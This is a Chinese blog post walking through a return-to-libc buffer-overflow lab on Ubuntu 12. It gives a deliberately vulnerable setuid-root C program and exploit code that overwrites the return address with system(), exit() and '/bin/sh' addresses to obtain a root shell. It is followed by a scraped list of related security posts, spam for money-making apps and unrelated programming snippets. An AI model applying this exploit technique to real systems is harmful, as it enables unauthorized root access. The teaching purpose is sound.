ustc_sec
ustc_sec

软件安全-return-to-libc攻防

Return-to-libc Attack Lab

实验目的:绕过栈保护机制,通过缓冲区溢出,获取ubuntu12的root权限
为了对抗缓冲区溢出漏洞,一般linux操作系统允许管理员设置栈不可执行,
这将直接导致将程序控制权直接跳转到shellcode无法运行,造成攻击失败。

为了对抗不可执行栈,聪明的黑客提出了return-to-libc攻击。攻击者不需要可执行的栈,
甚至不需要shellcode。return-to-libc攻击通过将程序的控制权跳转到系统自己的可执行代码,
例如,在libc库中的system()函数,这些函数已经存在于内存中了。

实验目标:

  • 本次实验将给出一个有缓冲区溢出漏洞的程序,你需要通过return-to-libc攻击,并获取root权限。
  • 你需要掌握堆栈模型,system()、exit()、“/bin/sh”在内存中的地址,掌握gdb调试。

准备工作

你可以在ubuntu12中完成本次实验。为了简化攻击,我们需要关闭一些保护机制。

  • 地址随机化 su sysctl -w kernel.randomize_va_space=0
  • 栈保护机制(canaria)gcc -fno-stack-protector ****.c
  • 栈不可执行 gcc -z execstack ****.c

The Vulnerable Program

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include 
#include 
#include 

int bof(FILE *badfile)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    fread(buffer, sizeof(char), 40, badfile);

    return 1;
}

int main(int argc, char **argv)
{
    FILE *badfile;

    badfile = fopen("badfile", "r");
    bof(badfile);

    printf("Returned Properly\n");

    fclose(badfile);
    return 1;
}

为了后续return-to-libc攻击能获取到root权限,而不是仅仅弹出一个普通用户的shell,

我们需要编译并设置有效id为root。

$ su root
Password (enter root password)
# gcc -fno-stack-protector -z noexecstack -o retlib retlib.c
# chmod 4755 retlib
# exit

当badfile文件中内容大小低于缓冲区大小的时候,程序正常。

当文件内容大小超过缓冲区大小的时候,程序异常,发生缓冲区溢出。

Exploting the Vulnerability

#include 
#include 
#include 
int main(int argc, char **argv)
{
  char buf[40];
  FILE *badfile;
  int base = 24;
  badfile = fopen("./badfile", "w");

  /* You need to decide the addresses and 
     the values for X, Y, Z. The order of the following 
     three statements does not imply the order of X, Y, Z.
     Actually, we intentionally scrambled the order. */
  *(long *) &buf[base+8] = 0xb7f7ff18;   //  "/bin/sh"
  *(long *) &buf[base] = 0xb7e5e430;   //  system()
  *(long *) &buf[base+4] = 0xb7e51fb0;   //  exit()

  fwrite(buf, sizeof(buf), 1, badfile);
  fclose(badfile);
}

编译运行:获取root权限

软件安全-return-to-libc攻防_第1张图片
获取root权限

如何获取libc函数地址?

创建一个简单程序:

软件安全-return-to-libc攻防_第2张图片
如何获取libc函数地址?

通过gdb查看libc中函数地址:

软件安全-return-to-libc攻防_第3张图片
通过gdb查看libc中函数地址

如何获取字符串“/bin/sh”在内存中的地址?

  • 方案1:设置一个临时的环境变量MYSHELL=/bin/sh
    获取这个环境变量在内存中的地址
软件安全-return-to-libc攻防_第4张图片
设置一个临时的环境变量MYSHELL=/bin/sh
  • 方案2:用上面获取libc的方式,在libc.so中寻找”/bin/sh”
软件安全-return-to-libc攻防_第5张图片
在libc.so中寻找”/bin/sh”

如何理解函数调用?

AT&T汇编
ebp寄存器:堆栈栈底
esp寄存器:堆栈栈顶
eax寄存器:保持函数返回的数据

call foo的含义:
pushl %eip
movl f,%eip

leave的含义:
movl %ebp,%esp
popl %ebp

ret的含义:
popl %eip

你可能感兴趣的:(软件安全-return-to-libc攻防)

  • XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发 爱敲键盘的pig 前端xss网络安全
    演示案例:XSS跨站-安全防御-CSPXSS跨站-安全防御-HttpOnlyXSS跨站-安全防御-XSSFilter1.CSP(Content Security Policy 内容安全策略)内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,它的实现和执行全部由浏览器完成,开发者只需提供配置。禁止加载外域代码,防
  • Linux操作系统-09-Tcpdump流量监控工具 Zkaisen 安全与运维linuxtcpdump网络
    从防火墙的角度来看,从入侵攻击的特征来看,从入侵检测的防护手段来看,从流量分析预警的来看,几乎所有的网络安全攻防的一些行为都可以通过流量来进行处理。一、流量监控特征对一个通信过程分析,首先需要把握5个最基本数据,然后再具体查看内容(Payload:载荷),还有就是协议通信过程中一些特定的字段,可以通过这些字段来判定是否是攻击行为。源IP:谁发起的请求,谁就是源,任意一端都可能是源,也可能是目标源端
  • 2024三掌柜赠书活动第十四期:网络靶场与攻防演练 三掌柜666 php网络web安全
    目录前言网络靶场的概念和作用攻防演练的重要性和实施方法1、攻防演练的重要性2、攻防演练的实施方法关于《网络靶场与攻防演练》编辑推荐内容简介作者简介图书目录书中前言/序言《网络靶场与攻防演练》全书速览结束语前言在当今数字化时代,随着互联网的快速发展和应用程序的广泛使用,网络安全成为了各个组织和企业不可忽视的重要领域,成为了不可或缺的一部分。为了保护网络免受各种威胁和攻击,网络靶场和攻防演练成为了一种
  • 冰蝎shell_红蓝对抗——加密Webshell“冰蝎”攻防 weixin_39631649 冰蝎shell
    演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。0x01“冰蝎”介绍&
  • 众人帮赚钱安全吗(一天挣800元众人帮) 氧惠爱高省
    众人帮手机赚钱软件安全靠谱吗?作为任务悬赏类威客赚钱平台,它已经运营好几年,现在用手机做任务赚钱类的朋友都知道众人帮。很多人已经在众人帮赚到钱并提现,但论月入过万,那肯定还是少数,其中里面大多都是专职做app推广的,把握着大流量资源。至于说众人帮赚钱安全性和靠不靠谱,不同人界定不一样.抖音购物、看电影、点外卖、打车用氧惠APP!佣金更高、更优惠!氧惠(全网优惠上氧惠)——是与以往完全不同的抖客+淘
  • 软件安全测试报告模板_软件质量保证与测试(课后习题与答案)--仅供复习参考... weixin_39687359 软件安全测试报告模板
    第1章软件测试基础一、填空题1.软件从“出生”到“消亡”的过程称为软件生命周期2.早期的线性开发模型称为瀑布开发模型。3.引入风险分析的开发模型为_螺旋开发模型。4.ISO/IEC9126:1991标准提出的质量模型包括.功能性、可靠性、可使用性、效率、可维护性、可移植性_6大特性。5.按照缺陷的严重程度可以将缺陷划分为_严重、一般、次要、建议6.验证软件单元是否符合软件需求与设计的测试称为_单元
  • 1.网络游戏逆向分析与漏洞攻防-游戏启动流程漏洞-测试需求与需求拆解 染指1110 游戏安全网络游戏漏洞攻防
    内容参考于:易道云信息技术研究院VIP课上一个内容:分析接收到的对话数据包这是一个新的篇章,之前是关于把我们的东西放进游戏里和内存里的数据分析与利用,现在是专注于网络部分,通过分析网络数据包得到应用程序中各种数据,比如怪物、移动系统、技能、任务等之前的分析角度是站在开发的角度,现在的分析角度是站在测试的角度,想要做到这一点就要把我们想成我们是攻击者,用尽所有的攻击手段,把得到的漏洞都给列出来,交予
  • 网络攻防技术(2021期末考试) 星楼如初 期末考试安全
    一、名词解释(20分)1、什么是主动攻击?主动攻击包括哪些?什么是被动攻击?被动攻击包括哪些?2、什么是漏洞?漏洞有哪些特性?3、什么是Cookie?Cookie有哪些应用?画图说明跨站脚本攻击的攻击原理?二、判断题(30分)(正确(T)错误(F)每小题3分)1、计算机安全就是网络安全。2、实施拒绝服务攻击的前提是系统存在某种安全漏洞。3、SYN攻击是一种典型的欺骗攻击。4、计算机病毒必须通过感染
  • 安全名词解析-攻防演练 Vista_AX 安全名词剖析安全web安全网络
    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓01攻防演练01攻防演练《网络安全法》中明确提出,“定期组织关键信息基础设施的运营者进行网络安全应急演练,提高应对网络安全事件的水平和协同配合能力。”攻防演练目前已经成为检验国家重要行业的关键信息基础设施运营者网络安全防护能力的最有效途径。网络安全攻防演练是以获取指定目标系统(标靶系统)的管理权限为目标,在真实网络环境下,采用不限攻击路径和攻击手段
  • <网络安全>《35 网络攻防专业课<第一课 - 网络攻防准备>》 Ealser #网络安全web安全网络安全网络攻防
    1主要内容认识黑客认识端口常见术语与命令网络攻击流程VMWare虚拟环境靶机搭建2认识黑客2.1白帽、灰帽和黑帽黑客白帽黑客是指有能力破坏电脑安全但不具恶意目的黑客。灰帽黑客是指对于伦理和法律态度不明的黑客。黑帽黑客经常用于区别于一般(正面的)理性黑客,一个犯罪和黑客的合成词。2.2黑客、红客、蓝客和骇客黑客:Hacker,水平超高的电脑专家,尤其是程序设计人员,是一个统称。红客:维护国家利益,代
  • 常见Web安全漏洞的实际案例和攻防技术 清水白石008 web安全安全
    常见Web安全漏洞的实际案例和攻防技术1、SQL注入攻击与防范:通过一个简单的Web应用演示SQL注入攻击,包括入侵者如何通过输入恶意SQL语句来获取敏感数据。提供相应的防范措施,包括参数化查询、ORM框架的使用等,并附上实际代码演示。Copycode#恶意SQL注入语句的示例SELECT*FROMusersWHEREusername='admin'ANDpassword='xxx'OR'1'=
  • 国内外黑客居然都在这些地方聚集 MR_sasa 黑客安全信息安全其他数据挖掘
    1.track黑客导航导航Track黑客导航黑客导航,含有众多网安一行的官方网站及平台无论你是老鸟还是萌新,都可以找得到对应适合的文章!2.封神台靶场封神台-掌控安全在线演练靶场,是一个在线黑客攻防演练平台。在线练习靶场,是一个在线黑客攻防演练平台!在成长的道路上怎么能缺少打怪刷级的乐趣呢!但是市面上的网站漏洞组成复杂,而且会有法律风险,想要技术,封神台靶场是一个好的选择3.黑客社区Track安全
  • 金蝶云星空物料批量禁用反禁用程序 coderxgc 乐于分享金蝶云星空物料批量禁用
    【需求描述】:需要通过批量禁用反禁用操作物料。【操作方法】:下载附件批量禁用程序。首先双击安装,一直下一步。双击打开会提示需要配置账套信息点击菜单栏配置输入相关配置信息填写完毕后然后点击下载模板导入要下载的数据选择禁用点击开始就可以了禁用逻辑是,先查询数量,如果数量为0则开始禁用。然后可以到导入文件查看禁用数据以及有库存数据。【问答】:Q:软件安全吗?会不会有盗取数据风险A:绿色安全,支持任何检测
  • Web安全攻防_渗透测试实战指南 立志成为网安大牛 web安全安全
    目录第1章渗透测试之信息收集1.1收集域名信息1.1.1Whois查询1.1.2备案信息查询1.2收集敏感信息1.3收集子域名信息1.4收集常用端口信息1.5指纹识别1.6查找真实IP1.7收集敏感目录文件1.8社会工程学第1章渗透测试之信息收集**1.1收集域名信息**①得知目标域名②获取域名注册信息(域名DNS服务器信息和注册人联系信息)1.1.1Whois查询标准互联网协议,收集网络注册信息
  • 手机赚钱软件排名前十,最良心赚钱最快的软件 好项目高省
    免费赚钱软件哪个赚钱多,又安全?如今,网上的赚钱软件基本都是免费赚钱的,但是我们还是不能掉以轻心,毕竟还要考虑到安全性以及收益,一些软件虽然收益高但是不安全,一些软件安全但收益低,所以要想兼顾安全和收益还真的挺难的,不过少也并不代表没有,我手里就有几款在保障用户各方面安全的情况下收益还不错的软件,如果你有兴趣,那么就不妨了解一下吧!1、高省app大家好,我是阿飞导师,使用【高省app】网购,更便宜
  • 小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2 等 yiqiqukanhaiba 安全web安全sql
    #知识点:1、数据库注入-Oracle&Mongodb2、数据库注入-DB2&SQLite&Sybase3、SQL注入神器-SQLMAP安装使用拓展数据库注入:数据库注入-联合猜解-Oracle&Mongodb1.Oracle数据库一般会在java上执行参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html猜回显位:用的是单引号,进行猜测
  • 人和病原体间的攻防战——《我们为什么生病》笔记三 蹉跎笑我
    一、人体在长时间的自然选择中,进化出多种多样的防御措施,以对抗病原体的入侵。A、发热是一种对抗感染的防御机制发热是动物对抗感染的防御机制,蜥蜴被感染时,会选择一个温暖的地方把体温升高2℃左右。上世纪初,抗生素尚未问世,Julius注意到疟疾高发地区梅毒发病率低,他让梅毒患者感染疟疾,利用反复的发烧来治疗梅毒,毕竟梅毒无药可治,疟疾有奎宁治疗,他使梅毒的缓解率由1%提高到30%,因此获1927年诺贝
  • 2022-08-19学易杂谈(196-200) 七星客球体卦
    【学易杂谈】(196)周易中的攻防进攻与防御,是战争的两种基本状态。周易中有许多关于攻与防的描述,结合卦体与易道,深入探讨什么情况下应当主动进攻?什么情况下应当防御?也是一个很有意义的话题。“征吉”,“利用行師,征邑國”,“利建侯,行師”,如此等等,这些辞句不用多做解释,人们也知道这是说的适宜发动战争。那么是什么原因或条件,使得某些卦爻,非要发动战争不可呢?我们先说说泰卦,兹列泰卦图如下:再录出泰
  • 谈本手与妙手1 许立心
    人生如棋。妙手总是在焦灼之时的灵光一现或大胆进取。但妙手从来偶得,扎实的本手才是基本盘,有了基本盘才有可能在机会来临时锐意进取建立优势,或是绝处逢生扭转乾坤。很多总是惊艳于别人的妙手,却忘记了基本盘由每一手的扎实攻防造就。若一昧求快,久攻不下必然折了后劲,失了纵深。
  • 【网络攻防实验】【北京航空航天大学】【实验三、口令破解(Password Cracking)实验】 不是AI 网络技术虚拟机网络攻防网络服务器linux
    实验三、口令破解(PasswordCracking)实验一、L0phtCrack破解实验1、注册L0phtCrack:2、设置口令:(1)创建3个新账户:帐户创建过程(以test-1为例):帐户创建结果:(2)使用L0phtCrack破解口令:(使用管理员账号运行程序)口令破解结果:正确破解口令。二、JohntheRipper破解实验1、用户口令破解:(1)在KaliLinux上新建2个用户,并为
  • 2个19比21,王懿律/黄东萍遗憾0比2负于东渡组合,输在快速攻防 虫大话体坛
    2个19比21,王懿律/黄东萍遗憾0比2负于东渡组合,输在快速攻防。北京时间3月21日凌晨,2022全英羽毛球公开赛决出混双的冠军,王懿律/黄东萍0比2遗憾负于日本组合渡边勇大/东野有纱,无缘冠军,两局比分均为19比21。今晚这场比赛进行得异常激烈,双方打出了高水平的攻防大战,王懿律/黄东萍时隔半年再次迎来如此激烈的比赛,这场比赛东渡组合发挥更出色,速度方面压制住了黄鸭组合,取胜再意料之中。不过今
  • 排球少年漫画363解读—乌野队内的日向效应 痞子陈在天
    日本漫画《排球少年》作者:古馆春一上一期日向和星海两个小巨人发挥各自本领,将比赛带入到了另外一个高潮。这一期,随着两个小巨人的对决,乌野队内也发生着一些变化。一个是坚持着要当最强诱饵但又随时可以得分的日向,一个是攻防俱佳目前最强小个子星海,两个人风格不同,一个是以星海为核心,另一个则是以日向为某一个战术,完全不同的定位,但对决依然精彩。两个小巨人对决,日向把之前的直跳和横向跳加了改良,创造出了斜向
  • 红队笔记Day2 -->上线不出网机器 [email protected] 内网网络安全
    今天就来讲一下在企业攻防中如何上线不出网的机器!!1.基本网络拓扑基本的网络拓扑就是这样以下是对应得的P信息,其中的52网段充当一个内网的网段,而111充当公网网段先ping一下,确保外网ping不通内网,内网ping不通外网我的电脑:DC:2.端口转发(正向TCP连接)首先要确保的是DC的3389端口是开启的(不开启的话还要去黑掉它让他开启)这里我选择采用lcx进行端口转发,首先肯定是将lcx扔
  • 网安第三次实验 P71720 Web安全实验
    网安第三次实验(CSRF,XSS和点击劫持攻防)相关资源已上传,正在审核,谢谢~(一)CSRF攻击和防御攻击废话不多说,直接上代码:`CSRFAttackHi,I'mcsrf_aform=document.getElementById("transferform");form.submit();`这段代码的意思是,当别人点击了我的链接跳转到我的界面时,我的页面中隐藏了一个表单,并且通过form.s
  • 知球人【美职业】前瞻:亚特兰大联 vs 休斯敦迪纳摩 | 主场龙对客场虫 知球人
    亚特兰大联亚特兰大联上轮联赛客场征战西雅图音速,原本有机会能够不败而归,可是防守端的失误依然太多,最终1-2吞败,目前亚特兰大联近况不理想,除了已经三轮联赛不胜的困境,这三轮联赛失球数高达10球,防守端漏洞相当严重,主场方面来看,亚特兰大联属于典型的主场龙特性,近10个联赛主场拿下6胜3平1负的成绩,锋线状态表现稳定,同时有5场能够零封对手,呈现攻防均衡的特性。休斯敦迪纳摩休斯敦迪纳摩上轮联赛主场
  • 哪一个赚钱软件赚钱快?正规挣钱最快的app 古楼
    免费赚钱软件哪个赚钱多,又安全?哪款软件是赚钱最快的呢?如今,网上的赚钱软件基本都是免费赚钱的,但是我们还是不能掉以轻心,毕竟还要考虑到安全性以及收益,一些软件虽然收益高但是不安全,一些软件安全但收益低,所以要想兼顾安全和收益还真的挺难的,不过少也并不代表没有,我手里就有几款在保障用户各方面安全的情况下收益还不错的软件,如果你有兴趣,那么就不妨了解一下吧!1、社交电商高省app这个项目比较吃香,全
  • 软件安全开发 星环之光 网络安全软件工程
    本文已收录至《全国计算机等级考试——信息安全技术》专栏1.1软件安全开发背景1.1.1软件的发展和安全问题软件是指计算机程序、方法和相关的文档资料,以及在计算机上运行时所需要的数据。软件安全问题有以下几个方面:(1)系统软件安全问题(2)应用软件安全问题(3)第三方代码安全(4)新技术安全问题软件的安全问题一般包含两个方面:一是软件的可靠性和可用性问题;二是软件中信息的保密性和完整性问题。1.1.
  • 8868体育助力意甲罗马足球俱乐部 球队喜迎四连胜 焦点易讯 业界资讯
    意甲的罗马足球俱乐部是8868体育合作的俱乐部之一,罗马目前取得11胜5平7负的成绩,排名意甲联赛第5的位置,本赛季主场表现相当出色,打出8胜3平1负的成绩,排名第三的位置,有着出色的攻防两端表现。他们近期状态相当火热,取得四连胜的近况,包括联赛方面处于3连胜走势打出,上场比赛回到主场作战,更是4:0大胜击败了卡利亚里,过去10个主场比赛下来有着8胜2平的不败成绩。
  • 又双叒叕 更新了!+团队介绍
    开源IoTOS团队介绍:多套主流ToC/ToB物联网卡系统主力开发;从事Java开发,拥有大数据量物联网卡运营综合业务系统开发经验、大量数据运营同步、数据安全链路加密通信数据攻防。服务器、数据库、运维、开源社区、客户维护等,行业内专业水准口碑。现打造‘开源IoTOS’系列助力物联网行业发展、拓展未来物联网行业从小微企业到中小企业国际化物联网市场,挖掘物联卡国际化蓝海。一、近期PC端后台更新支付配置
  • 数据库攻防学习之MySQL
    MySQL0x01mysql学习MySQL是瑞典的MySQLAB公司开发的一个可用于各种流行操作系统平台的关系数据库系统,它具有客户机/服务器体系结构的分布式数据库管理系统。可以免费使用使用,用的人数很多。0x02环境搭建这里演示用,phpstudy搭建的环境,然后安装phpmyadmin0x03漏洞复现日志文件包含getshell利用前提知道网站路径,mysql版本大于5.0利用条件需要可读可写
  • ztree设置禁用节点 3213213333332132 JavaScriptztreejsonsetDisabledNodeAjax
    ztree设置禁用节点的时候注意,当使用ajax后台请求数据,必须要设置为同步获取数据,否者会获取不到节点对象,导致设置禁用没有效果。 $(function(){ showTree(); setDisabledNode(); });
  • JVM patch by Taobao bookjovi javaHotSpot
    在网上无意中看到淘宝提交的hotspot patch,共四个,有意思,记录一下。   7050685:jsdbproc64.sh has a typo in the package name 7058036:FieldsAllocationStyle=2 does not work in 32-bit VM 7060619:C1 should respect inline and
  • 将session存储到数据库中 dcj3sjt126com sqlPHPsession
    CREATE TABLE sessions ( id CHAR(32) NOT NULL, data TEXT, last_accessed TIMESTAMP NOT NULL, PRIMARY KEY (id) );   <?php /** * Created by PhpStorm. * User: michaeldu * Date
  • Vector 171815164 vector
    public Vector<CartProduct> delCart(Vector<CartProduct> cart, String id) { for (int i = 0; i < cart.size(); i++) { if (cart.get(i).getId().equals(id)) { cart.remove(i);
  • 各连接池配置参数比较 g21121 连接池
            排版真心费劲,大家凑合看下吧,见谅~     Druid DBCP C3P0 Proxool 数据库用户名称 Username Username User   数据库密码 Password Password Password   驱动名
  • [简单]mybatis insert语句添加动态字段 53873039oycg mybatis
          mysql数据库,id自增,配置如下:       <insert id="saveTestTb" useGeneratedKeys="true" keyProperty="id" parameterType=&
  • struts2拦截器配置 云端月影 struts2拦截器
    struts2拦截器interceptor的三种配置方法 方法1. 普通配置法 <struts>     <package name="struts2" extends="struts-default">         &
  • IE中页面不居中,火狐谷歌等正常 aijuans IE中页面不居中
    问题是首页在火狐、谷歌、所有IE中正常显示,列表页的页面在火狐谷歌中正常,在IE6、7、8中都不中,觉得可能那个地方设置的让IE系列都不认识,仔细查看后发现,列表页中没写HTML模板部分没有添加DTD定义,就是<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
  • String,int,Integer,char 几个类型常见转换 antonyup_2006 htmlsql.net
    如何将字串 String 转换成整数 int? int i = Integer.valueOf(my_str).intValue(); int i=Integer.parseInt(str); 如何将字串 String 转换成Integer ? Integer integer=Integer.valueOf(str); 如何将整数 int 转换成字串 String ? 1.
  • PL/SQL的游标类型 百合不是茶 显示游标(静态游标)隐式游标游标的更新和删除%rowtyperef游标(动态游标)
    游标是oracle中的一个结果集,用于存放查询的结果;   PL/SQL中游标的声明; 1,声明游标 2,打开游标(默认是关闭的); 3,提取数据 4,关闭游标     注意的要点:游标必须声明在declare中,使用open打开游标,fetch取游标中的数据,close关闭游标   隐式游标:主要是对DML数据的操作隐
  • JUnit4中@AfterClass @BeforeClass @after @before的区别对比 bijian1013 JUnit4单元测试
    一.基础知识 JUnit4使用Java5中的注解(annotation),以下是JUnit4常用的几个annotation: @Before:初始化方法   对于每一个测试方法都要执行一次(注意与BeforeClass区别,后者是对于所有方法执行一次)@After:释放资源  对于每一个测试方法都要执行一次(注意与AfterClass区别,后者是对于所有方法执行一次
  • 精通Oracle10编程SQL(12)开发包 bijian1013 oracle数据库plsql
    /* *开发包 *包用于逻辑组合相关的PL/SQL类型(例如TABLE类型和RECORD类型)、PL/SQL项(例如游标和游标变量)和PL/SQL子程序(例如过程和函数) */ --包用于逻辑组合相关的PL/SQL类型、项和子程序,它由包规范和包体两部分组成 --建立包规范:包规范实际是包与应用程序之间的接口,它用于定义包的公用组件,包括常量、变量、游标、过程和函数等 --在包规
  • 【EhCache二】ehcache.xml配置详解 bit1129 ehcache.xml
    在ehcache官网上找了多次,终于找到ehcache.xml配置元素和属性的含义说明文档了,这个文档包含在ehcache.xml的注释中! ehcache.xml : http://ehcache.org/ehcache.xml ehcache.xsd : http://ehcache.org/ehcache.xsd ehcache配置文件的根元素是ehcahe   ehcac
  • java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderL 白糖_ javaeclipsespringtomcatWeb
    今天学习spring+cxf的时候遇到一个问题:在web.xml中配置了spring的上下文监听器: <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener>  随后启动
  • angular.element boyitech AngularJSAngularJS APIangular.element
    angular.element 描述:     包裹着一部分DOM element或者是HTML字符串,把它作为一个jQuery元素来处理。(类似于jQuery的选择器啦)     如果jQuery被引入了,则angular.element就可以看作是jQuery选择器,选择的对象可以使用jQuery的函数;如果jQuery不可用,angular.e
  • java-给定两个已排序序列,找出共同的元素。 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.List; public class CommonItemInTwoSortedArray { /** * 题目:给定两个已排序序列,找出共同的元素。 * 1.定义两个指针分别指向序列的开始。 * 如果指向的两个元素
  • sftp 异常,有遇到的吗?求解 Chen.H javajcraftauthjschjschexception
    com.jcraft.jsch.JSchException: Auth cancel at com.jcraft.jsch.Session.connect(Session.java:460) at com.jcraft.jsch.Session.connect(Session.java:154) at cn.vivame.util.ftp.SftpServerAccess.connec
  • [生物智能与人工智能]神经元中的电化学结构代表什么? comsci 人工智能
         我这里做一个大胆的猜想,生物神经网络中的神经元中包含着一些化学和类似电路的结构,这些结构通常用来扮演类似我们在拓扑分析系统中的节点嵌入方程一样,使得我们的神经网络产生智能判断的能力,而这些嵌入到节点中的方程同时也扮演着"经验"的角色....      我们可以尝试一下...在某些神经
  • 通过LAC和CID获取经纬度信息 dai_lm laccid
    方法1: 用浏览器打开http://www.minigps.net/cellsearch.html,然后输入lac和cid信息(mcc和mnc可以填0),如果数据正确就可以获得相应的经纬度 方法2: 发送HTTP请求到http://www.open-electronics.org/celltrack/cell.php?hex=0&lac=<lac>&cid=&
  • JAVA的困难分析 datamachine java
    前段时间转了一篇SQL的文章(http://datamachine.iteye.com/blog/1971896),文章不复杂,但思想深刻,就顺便思考了一下java的不足,当砖头丢出来,希望引点和田玉。   -----------------------------------------------------------------------------------------
  • 小学5年级英语单词背诵第二课 dcj3sjt126com englishword
    money 钱 paper 纸 speak 讲,说 tell 告诉   remember 记得,想起 knock 敲,击,打 question 问题 number 数字,号码   learn 学会,学习 street 街道 carry 搬运,携带 send 发送,邮寄,发射   must 必须 light 灯,光线,轻的 front
  • linux下面没有tree命令 dcj3sjt126com linux
    centos p安装 yum -y install tree   mac os安装 brew install tree   首先来看tree的用法 tree 中文解释:tree 功能说明:以树状图列出目录的内容。 语  法:tree [-aACdDfFgilnNpqstux][-I <范本样式>][-P <范本样式
  • Map迭代方式,Map迭代,Map循环 蕃薯耀 Map循环Map迭代Map迭代方式
    Map迭代方式,Map迭代,Map循环   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年
  • Spring Cache注解+Redis hanqunfeng spring
    Spring3.1 Cache注解  依赖jar包: <!-- redis --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redis</artifactId>
  • Guava中针对集合的 filter和过滤功能 jackyrong filter
    在guava库中,自带了过滤器(filter)的功能,可以用来对collection 进行过滤,先看例子:    @Test public void whenFilterWithIterables_thenFiltered() { List<String> names = Lists.newArrayList("John"
  • 学习编程那点事 lampcy 编程androidPHPhtml5
    一年前的夏天,我还在纠结要不要改行,要不要去学php?能学到真本事吗?改行能成功吗?太多的问题,我终于不顾一切,下定决心,辞去了工作,来到传说中的帝都。老师给的乘车方式还算有效,很顺利的就到了学校,赶巧了,正好学校搬到了新校区。先安顿了下来,过了个轻松的周末,第一次到帝都,逛逛吧! 接下来的周一,是我噩梦的开始,学习内容对我这个零基础的人来说,除了勉强完成老师布置的作业外,我已经没有时间和精力去
  • 架构师之流处理---------bytebuffer的mark,limit和flip nannan408 ByteBuffer
    1.前言。   如题,limit其实就是可以读取的字节长度的意思,flip是清空的意思,mark是标记的意思 。 2.例子. 例子代码: String str = "helloWorld"; ByteBuffer buff = ByteBuffer.wrap(str.getBytes()); Sy
  • org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1, column 1 Everyday都不同 $转义el表达式
    最近在做Highcharts的过程中,在写js时,出现了以下异常:   严重: Servlet.service() for servlet jsp threw exception org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1,
  • 用Java实现发送邮件到163 tntxia java实现
    /* 在java版经常看到有人问如何用javamail发送邮件?如何接收邮件?如何访问多个文件夹等。问题零散,而历史的回复早已经淹没在问题的海洋之中。 本人之前所做过一个java项目,其中包含有WebMail功能,当初为用java实现而对javamail摸索了一段时间,总算有点收获。看到论坛中的经常有此方面的问题,因此把我的一些经验帖出来,希望对大家有些帮助。 此篇仅介绍用
  • 探索实体类存在的真正意义 java小叶檀 POJO
    一. 实体类简述    实体类其实就是俗称的POJO,这种类一般不实现特殊框架下的接口,在程序中仅作为数据容器用来持久化存储数据用的 POJO(Plain Old Java Objects)简单的Java对象   它的一般格式就是 public class A{ private String id; public Str
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他